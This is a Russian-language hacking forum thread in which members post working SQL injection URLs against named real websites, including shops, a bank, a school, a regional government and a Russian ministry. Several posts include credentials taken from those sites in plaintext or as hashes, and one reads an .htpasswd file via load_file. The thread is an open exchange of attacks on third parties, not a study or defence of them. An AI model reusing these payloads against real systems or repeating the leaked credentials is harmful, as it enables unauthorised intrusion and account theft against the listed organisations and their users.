SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    geia.org.br/shop
    Code:
    http://geia.org.br/shop/detalhe.php?id=-197+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+35,1/*
     
  2. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    какой-то банк
    http://www.tsb.kz/info.php?id=180%20union%20select%201,version(),database(),4,5,user(),7,8/*
     
  3. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.urlopwpolsce.pl/kategoria.php?id=17+order+by+2/*
     
  4. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.Reflex.Se

    Code:
    http://www.reflex.se/news.php?ID=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7+from+users/*
     
  5. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.eletrofar.com.br/shop/compra.php?id=-40%20UNION%20SELECT%201,2,version(),4,5,6/*
     
  6. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.norden.ee/indexee.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
     
    1 person likes this.
  7. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    от \6/
    а где ннъекция?
     
  8. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    эээ вот тут была :)
    http://www.norden.ee/indexee.php?ID=17,23+order+by+16
     
  9. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.edu.upplands-bro.se/ubg/index.php?id=-214+union+select+1,user_name,user_password,4+from+admin/*
    name:Super Admin
    password:huggan
     
  10. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.tvdata.ru/catalog.php?dir=-2+union+select+1,2,3,4,5,load_file('/home/www/htdocs/admin/.htpasswd'),7,8,9,10,11,12/*

    http://www.offroad.ru/gallery/gal_picshow.php?g_id=-1+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*???
     
    #1310 *D1VER, 23 Mar 2007
    Last edited: 23 Mar 2007
  11. piton

    piton New Member

    Joined:
    14 Sep 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    http://2pay.ru/geo/?id=0&st=0&a=2&town=1'
    помогите ченить сделать дальше =)
     
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://christdot.org/modules.php?name=News&file=article&sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    дальше лень :D
    в поиске ксс
     
  13. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    avo.ru
    Администрация Владимирской области
    Code:
    http://www.avo.ru/content.php?menu=1603&page_id=147+and+147=-1+union+select+1,concat(user,0x3a,password)+from+mysql.user/*
    root:7bf340b309e53784

    ipm.cz
    Code:
    http://www.ipm.cz/group/index.php?group=-1+union+select+1,2,3,4,5,6,concat(user,0x3a,password),8,9+from+mysql.user+limit+1,1/*
    milada:5d6f92636d33cb3d

    пароли в mysql4-hash


    ///извините за 2 поста подряд, редакт. не работает почему-то..
     
    1 person likes this.
  14. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    MP3Db.ru
    Code:
    http://mp3db.ru/index.php?cid=8&subcid=-1+union+select+1,login,passwd,4,5,6,7,8,9,10,11,12+from+users/*
    пароли в md5
     
    1 person likes this.
  15. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    http://gp.by/admin

    Ошибка понравилась очень :)
    http://belarus21.by/admin

    А с этим можно что-нить сделать? Union не идет.
     
    2 people like this.
  16. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    МИНИСТЕРСТВО ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И СВЯЗИ РОССИЙСКОЙ Федерации

    Code:
    http://english.minsvyaz.ru/news.shtml?id=-1+UNION+SELECT+VERSION()/*&news_id=36
     
    1 person likes this.
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://valiza.com.ua/opinions.php?id=-1+union+select+1,2,concat(username,char(58),email,char(58),password),4,5,6,7+from+phorum_users/*
     
    1 person likes this.
  18. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    http://forum.filippoff.ru/theme.php?id=-58+union+select+1,2,concat(login,char(58)pass),4,5,6,7,8,910,11,12+from+users+limit+0,1/*

    Пасс в чистом виде=)

    roman:331133

    http://filippoff.ru/page.php?id=-12+union+select+1,concat(login,char(58),pass),3+from+user/*


    http://www.montech.ru/index.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    http://www.fischer-fix.ru/index.php?id=-127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

    http://www.lightpro.ru/news/detail.php?id_news=-3
    http://www.chelkomp.ru/description.php?id=00000000046&grp=-1
     
    #1318 Snap, 23 Mar 2007
    Last edited: 23 Mar 2007
    1 person likes this.
  19. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Code:
    http://www.jgts.net/post.php?id=-477+ORDER+BY+10/*
     
  20. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.barcode.shark.ru/page.php?id=180%20union%20select%201,2,password,4,5,6,7,8,9,10%20from%20mysql.user/*

    http://ventorg.ru/index.php?id=180%20union%20select%201/*

    http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5,6,7,8,9,10/*
     
Thread Status:
Not open for further replies.